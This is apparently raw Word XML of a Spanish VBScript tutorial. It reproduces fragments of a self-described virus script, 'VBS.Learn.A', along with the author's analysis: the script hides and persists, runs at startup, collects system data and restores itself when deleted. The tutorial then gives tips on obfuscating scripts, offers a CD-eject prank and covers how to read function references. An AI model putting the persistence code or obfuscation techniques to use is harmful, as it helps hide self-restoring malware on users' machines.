                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Leer, 55555)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="3322"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c5 = Fso.CreateTextFile (Var1&amp;"\"&amp;Nombre&amp;".dat</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>",True</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>) c5.Write MiCd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Var1 = Fso.GetSpecialFolder(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Tmp = Fso.GetTempNam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 Fa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Ms-Dos", Fa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Ms-Dos\Nucleo", Fa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Ms-Dos\Nucleo\Español", Fa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Ms-Dos\Nucleo\Español\Kernl"</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Ms-Dos\Nucleo\Español\Kernl\Temp"</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DelFile = Fso.CreateTextFile(Var1&amp;"\System32\Ms-Dos\Nucleo\Español\Kernl\Temp\"&amp;Tmp, Tru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elFile.WriteLine "</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>VBS.Learn.A</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a las "&amp;Now&amp;" en base a "&amp;W&amp;" "&amp;N&amp;" "&amp;A&amp;"."</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elFile.Write "Este archivo se puede eliminar de su sistema con total seguridad."</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opyFile Var1&amp;"\"&amp;Nombre, Var1&amp;"\"&amp;Temporal</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Var4 = Fso.GetFile(Var1&amp;"\"&amp;Temporal)</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4.Attributes = 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10 * 100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Fso.FileExists(Var1&amp;"\"&amp;Nombre) = False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opyFile Var1&amp;"\"&amp;Temporal, Var1&amp;"\"&amp;Nombre</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Run</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> Var1&amp;"\"&amp;Nombr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initeProgram = Tru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oop Until FiniteProgram =True</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que el autor afirma que es un virus no puede ser categorizado de más que una broma inofensiva que encima te indica adecuadamente como evitar su ejecución. Vemos que más o menos este script sigue un orden: tras el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Option Explicit</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> declara todas las variables de carácter general, y a continuación les de valores iniciales y declara las funciones personalizadas. Luego vemos que inicia proceso de copiado de un archivo (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>en este caso, suponemos que esto esta en el archivo kernl.vbs, pues es ahí donde lo encontré, y que por tanto se copia a si mismo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">) a la carpeta Windows. Se pone a su copia los atributos solo lectura, sistema y oculto y manda ejecutarla cada vez que se inicia Windows. Luego busca cual es la dirección actual del Escritorio y crea en él un archivo con </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">instrucciones de eliminación.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reúne datos sin importancia (más que nada versiones y modelos de hardware y software que obtiene del registro) y los anexa en un archivo de máximo 55555 caracteres en la carpeta Windows (kernl.vbs.dat). Luego se hace una copia de si en un directorio inventado (con poca imaginación) avisando de que se puede borrar sin problemas, y crea un bucle que cada 10 segundos comprueba si aún existe el kernl.vbs en la carpeta Windows, y si no lo restituye con la copia que ha hecho en el directorio inventad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te fijas, no es difícil saber que hace o deja de hacer un script, y más si realmente esta bien creado (ordenado y correcto). Si nuestra intención es ocultar lo que hace un script tenemos varias salidas, de entre las cuales, destaco el uso de tres algoritmos: El primero será el cambio de nombre en las variables del script por cosas complicadas. El segundo poner todos los argumentos de las funciones (todo aquello que en el Script va entre comillas), mediante una sucesión de la función </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 xml:space="preserve">). Y el tercero, una falsificación de las líneas mediante el operador “_”, presente en Visual Basic Script. También se pueden complicar las operaciones matemáticas (en vez de 2 poner 5-3+(7*2)-14 o más dificiles). Esto manualmente es mucho trabajo, así que puedes usar programas especializados como </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CryptoVBS</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId61">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://scswinter.wordpress.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId62">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para codificarlos y ocultarlos. Por otro lado, creo que el ver ejemplos como estos ayudan mucho en lo que a comprensión se refiere, y estaría bien intentar crear algo parecido para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>practicar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</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Bueno, y para acabar esta sección, como colofón final, el siguiente script, del que podeis sacar mucho, realmente muchisimo:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8502" w:type="dxa"/>
        <w:tblInd w:w="74" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8502"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1350"/>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ahoma"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Set v = CreateObject("WMPlayer.OCX.7")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="1" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="6153" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Tahoma"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Set var = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Tahoma"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>v.cdromCollection</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Tahoma"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> i=0 do</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="2" w:line="237" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="644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ahoma"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>var.Item</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Tahoma"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(i).eject() i=i+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ahoma"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>loop until i&gt;=var.count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="898"/>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es otro objeto, presente desde la versión 7 del </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Media Player</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que en este ejemplo juega con… Si…Las unidades de CD. Con un poco de interés, y lo explicado de colecciones y estructuras, con esto podréis sacar, al menos, como manipular para abrir cualquier unidad de CD.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="176"/>
        <w:ind w:left="210" w:righ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Programación en Visual Basic Script: Uso de las Referencia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Para continuar aprendiendo a partir de ahora, o bien recordar contenido de forma fácil y rápida, una vez se tiene práctica es necesario empezar a acudir a las referencias, en vez de a tutoriales, para aprender ya la forma técnica y real del lenguaje. Para aprender esto, lo más adecuados es mostrar ejemplos de referencias y enseñar a interpretarlas adecuadamente. Veamos pues, varios ejemplos de referencias, empezando por uno más sencillo para introducir las claves de interpretación básicas:</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5398770" cy="3265170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11822" name="Picture 11822"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="11822" name="Picture 11822"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5398770" cy="326517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como podemos observar en primer lugar aparece el titulo de la función, que en este caso es la función Len, que como bien explica a continuación, devuelve el número de caracteres de una cadena o el numero de bytes necesarios para almacenar una variable (es decir, el numero de caracteres, valga la redundancia). A continuación vemos lo importantes: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Len(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">cadena | variable). </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Esto nos quiere decir varias cosas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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orma de la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es</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i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Len(argumentos)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y no otra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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iene solo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> argumento pues </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>no hay comas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que separen nada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="12" w:line="259" w:lineRule="auto"/>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Que el valor del único argumento puede ser una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cadena</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del tipo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Len(“Hola”).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Que el valor del único argumento también puede ser una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especifica sobre los argumentos y da una observación (generalmente uno o varios ejemplos). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Finalmente</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la versión necesaria para ejecutar el comando (hoy en día todo el mundo tiene la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5.6</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, así que no hay problema) y las funciones relacionadas.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Como vemos, no es tan difícil de entender. Pongamos ahora un ejemplo un poco más complejo, sacado de una referencia diferente, para explicar otro tipo de datos que se muestran en ella:</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5143500" cy="4672330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11878" name="Picture 11878"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="11878" name="Picture 11878"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5143500" cy="467233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emos que en este caso se trata de la función Round, que devuelve el número redondeado con un número concreto de decimales (según la explicación de la función). Luego vemos que pone </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Round(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">expresión [, lugardecimales]). </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Esto significa que la función se llama Round, que tiene </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> argumentos y que el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>segundo es omisible</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> ya que está entre </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>corchetes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">.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nos lo explica, podemos usar la función de las siguientes maneras pues:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="10"/>
        <w:ind w:hanging="360"/>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Round(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Variable = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Round(Variable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="10"/>
        <w:ind w:hanging="360"/>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Round(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5,4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Variable = 5: Round(Variable,4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
